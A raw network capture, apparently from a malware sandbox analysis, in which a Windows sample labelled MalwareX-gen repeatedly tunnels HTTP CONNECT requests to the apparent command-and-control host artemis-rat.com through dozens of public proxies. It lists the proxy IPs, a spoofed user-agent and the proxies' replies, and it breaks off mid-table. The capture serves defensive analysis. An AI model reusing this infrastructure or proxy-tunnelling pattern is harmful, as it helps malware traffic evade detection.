                                              Mar 11, 2024 08:37:20.918605089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              858192.168.2.45045051.161.131.84586127284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.920634985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.053992033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.163630009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.257096052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.272454977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              859192.168.2.4526424.236.183.3780807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.929387093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.569492102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.257837057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.663686037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.892077923 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.22.0
                                              Date: Mon, 11 Mar 2024 07:37:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              860192.168.2.452211133.18.234.13807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.935432911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.214003086 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                              Data Ascii: Backend not available


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              861192.168.2.452607218.252.244.126807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.935663939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              862192.168.2.45261120.37.207.880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.941327095 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:21.260164022 CET72INHTTP/1.1 200 Connection established
                                              Proxy-Agent: Fortinet-Proxy/1.0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              863192.168.2.452605110.12.211.140807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.941462040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              864192.168.2.452761162.159.242.104807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.948518991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.109469891 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              865192.168.2.45224289.46.249.14888887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.954248905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.756994963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.663434029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.367364883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.868730068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.366738081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.866429090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.756951094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              866192.168.2.45268838.54.95.1990807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.957665920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.178415060 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              867192.168.2.45039035.200.161.98807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.957716942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.954629898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.960566998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.754241943 CET83INHTTP/1.0 200 Connection Established
                                              Proxy-agent: Apache/2.4.57 (CentOS Stream)


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              868192.168.2.452604177.135.83.24456787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.959465981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              869192.168.2.452792172.67.127.188807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.960670948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.117976904 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              870192.168.2.45262445.81.232.17214817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.964710951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.663316965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.663350105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              871192.168.2.452706141.148.26.23480817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.966166019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.302361965 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              872192.168.2.452802104.16.105.15807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.970467091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.127183914 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              873192.168.2.452583102.132.50.680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.976991892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              874192.168.2.45223439.109.113.9731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.977281094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.758146048 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.16.1
                                              Date: Mon, 11 Mar 2024 07:16:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              875192.168.2.45204860.12.168.11490027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.980418921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.437643051 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 08:16:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              876192.168.2.452620221.231.13.19810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.041476011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              877192.168.2.45266923.137.248.19788887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.044147968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              878192.168.2.452629103.23.100.141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.044151068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              879192.168.2.452839172.67.219.60807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.044173002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.198916912 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              880192.168.2.45276938.162.10.5331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.044238091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.544079065 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              881192.168.2.452346171.250.221.19110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.044238091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
